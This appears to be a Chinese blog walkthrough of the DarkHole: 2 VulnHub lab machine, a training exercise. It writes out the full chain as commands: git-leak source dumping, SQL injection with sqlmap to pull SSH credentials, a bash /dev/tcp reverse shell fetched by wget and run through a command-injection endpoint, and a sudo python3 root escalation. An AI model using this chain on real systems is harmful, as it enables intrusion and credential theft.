赞
踩
靶机下载地址
DarkHole: 2 ~ VulnHub
kali攻击机ip:192.168.168.128
靶机ip:192.168.168.133
下载好了把安装包解压 然后使用VMware打开即可。
注:kali和靶机都要在NAT模式下
查看靶机的MAC地址
扫描主机,三种方法都能扫描主机
arp-scan -l
nmap -sn 192.168.168.0/24
nmap -sV 192.168.168.0/24
最终得出靶机地址:192.168.168.133
发现80,22端口是开放的
nmap -sS -sV -O 192.168.168.133 -p-
发现了git信息泄露
dirb http://192.168.168.133/
whatweb http://192.168.168.133/
dirsearch -u "http://192.168.168.133/"
发现了登录页面,需要输入账号密码。
http://192.168.168.133/login.php
http://192.168.168.133/.git/
下载.git源码在kali里
方法一:使用GitHack工具
git clone https://github.com/lijiejie/GitHack.git #下载GitHack
python3 GitHack.py http://172.16.5.170/.git #将源码下载本地
方法二:
wget -r http://192.168.168.133/.git/
cat login.php
cd /GitHack/192.168.168.133 #进入网址源码
git clone ./ webapp #创建一个webapp的源码文件,可以在其中执行所有git操作
cd webapp
git log #查看日志记录,发现git日志当中存在修改记录
git checkout a4d9 #详细查看
cat login.php #进入login.php
得到密码为:lush@admin.com/321 尝试登入,发现登入成功!!!!
得到密码为:lush@admin.com/321 尝试登入 发现登入成功!!!
http://192.168.168.133/login.php
http://192.168.168.133/dashboard.php?id=1
(这里我使用的火狐,火狐Cookie在存储->Cookie->PHPSESSION)
发现网页URL有id存在可能存在SQL注入可以直接使用sqlmap工具,F12获取网页cookie值:PHPSESSID=td2abstm7abbb1ona5snosc5r8
python3 sqlmap.py -u "http://192.168.168.133/dashboard.php?id=1" --cookie="PHPSESSID=td2abstm7abbb1ona5snosc5r8" --batch
darkhole_2
python3 sqlmap.py -u "http://192.168.168.133/dashboard.php?id=1" --cookie="PHPSESSID=td2abstm7abbb1ona5snosc5r8" --batch --current-db
ssh
user
python3 sqlmap.py -u "http://192.168.168.133/dashboard.php?id=1" --cookie="PHPSESSID=td2abstm7abbb1ona5snosc5r8" --batch -D darkhole_2 --tables
用户名/密码: jehad/fool
python3 sqlmap.py -u "http://192.168.168.133/dashboard.php?id=1" --cookie="PHPSESSID=td2abstm7abbb1ona5snosc5r8" --batch -D darkhole_2 -T ssh --dump
得到了账号密码:jehad/fool 尝试SSH登入!!
ssh jehad@192.168.168.133
发现jehad为普通⽤户,查看jehad⽤户命令记录,发现命令执⾏。
sudo -l
find / -user root -perm -4000 -print 2>/dev/null #查看有没有 SUID 文件可以利用
cat .bash_history #查看历史文件
cat /etc/crontab #查看定时任务
尝试输⼊ curl "http://127.0.0.1:9999/?cmd=id" 执⾏成功,是losy⽤户的权限。
Kali上编写反弹shell,并起HTTP临时服务
cd dev
echo 'bash -i >& /dev/tcp/192.168.168.128/8888 0>&1' >shell
cat shell
chmod +x shell
ls
python3 -m http.server #开启HTTP临时服务
靶机上,将shell⽂件,下载到tmp⽂件夹下
cd /tmp
wget http://192.168.168.128:8000/shell
ls
chmod +x shell
因为是Get传参,所以需要将参数进⾏URL编码
?cmd=bash%20%2Ftmp%2Fshell
curl "http://127.0.0.1:9999/?cmd=bash%20%2Ftmp%2Fshell"
攻击机开启监听
nc -lvnp 8888
反弹shell成功,尝试提权!!!
sudo -l
history
curl "http://127.0.0.1:9999/?cmd=id"
ssh losy@192.168.168.133
sudo /usr/bin/python3 -c "import os;os.system('/bin/bash')"
sudo -l 提示需要密码 ---> 查看历史命令 history
发现密码:gang,以及可以使⽤python3提权 ssh连接
cd /root
cat root.txt
成功!!!
(谢谢大家!欢迎提出批评和建议!你的支持是我持续更新的巨大动力!)
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。